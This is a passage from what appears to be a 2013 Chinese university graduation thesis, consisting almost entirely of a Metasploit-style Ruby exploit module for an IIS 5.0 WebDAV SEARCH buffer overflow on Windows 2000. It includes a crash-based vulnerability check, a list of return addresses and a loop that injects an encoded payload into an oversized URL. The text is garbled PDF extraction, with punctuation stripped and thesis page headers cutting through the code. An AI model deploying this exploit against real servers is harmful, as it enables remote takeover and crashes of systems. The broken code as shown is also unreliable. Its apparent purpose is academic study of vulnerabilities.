44、ams, http:header_folding) end def autofilter # 若默認(rèn)漏洞掃描工具會掃描端口 445 和端口 139，將其改為走 80 端口 rport = datastorerport.to_i if ( rport = 139 or rport = 445 ) rport = 80 end true 北京城市學(xué)院 2013 屆畢業(yè)設(shè)計 13 end #下段程序用來檢查參數(shù)設(shè)定情況，以及目標(biāo)是否可以攻擊 def check url = x * 65535 xml = rnrn + rnselect dav:displayname from scope()rnrn

45、rn response = send_request_cgi( uri = / + url, ctype = text/xml, method = search, data = xml , 5) if (response and response.body = /server error(exception/) return exploit:checkcode:vulnerable end # did the server stop acceping requests? begin send_request_raw(uri = /, 5) rescue return exploit:check

46、code:vulnerable end return exploit:checkcode:safe end def exploit # 首先驗證服務(wù)正在運(yùn)行 send_request_raw(uri = /, 5) # 能進(jìn)行攻擊的目標(biāo)系統(tǒng) 北京城市學(xué)院 2013 屆畢業(yè)設(shè)計 14 targets = # windows 2000 的這些系統(tǒng)都能成為目標(biāo) x4fx4e, # =sp3 x41x42, # sp0 sp2 x41x43, # sp1, sp2 x41xc1, x41xc3, x41xc9, x41xca, x41xcb, x41xcc, x41xcd, x41xce, x41xc

47、f, x41xd0, #尋找導(dǎo)致 iis5.0 數(shù)據(jù) xml = rnrn + rnselect dav:displayname from scope()rnrnrn if datastoreinvalid_search_request = true xml = rand_text(rand(1024) + 32) end #默認(rèn)值會造成 cpu 的崩潰，所以我們使用靜態(tài)值 a # 對 inc ecx進(jìn)行解碼 url = a * 65516 url url.length - payload.encoded.length, payload.encoded.length = payload.enc

48、oded 北京城市學(xué)院 2013 屆畢業(yè)設(shè)計 15 targets.each |ret| print_status(trying return address 0 x%.8x. % rex:text.to_unicode(ret).unpack(v)0) url 283, 2 = ret begin send_request_cgi( uri = / + url, ctype = text/xml, method = search, data = xml , 5) handler rescue = e print_error(attempt failed: #e) end 1.upto(8)

49、|i| select(nil,nil,nil,0.25) return if self.session_created? #返回目標(biāo)系統(tǒng)的狀態(tài) if !service_running? print_error(giving up, iis must have completely crashed) return end end #以 2 秒每次嘗試連接 server，共 20 次 # 在一次失敗的連接后，讓 server 有恢復(fù)時間 def service_running? print_status(checking if iis is back up after a failed attempt.) 北京城市學(xué)院 2013 屆畢業(yè)設(shè)計 16 1.upto(20) |i| begin send_request_raw(uri = /, 5) rescue print_error(connection failed (#i of 20).) select(nil,nil,nil,2) next end return true return false end end 五、五、windows xp的掃描過程及其解決方案的掃描過程及其解決方案 （一）掃描過程（一）掃描過程 第一步：啟動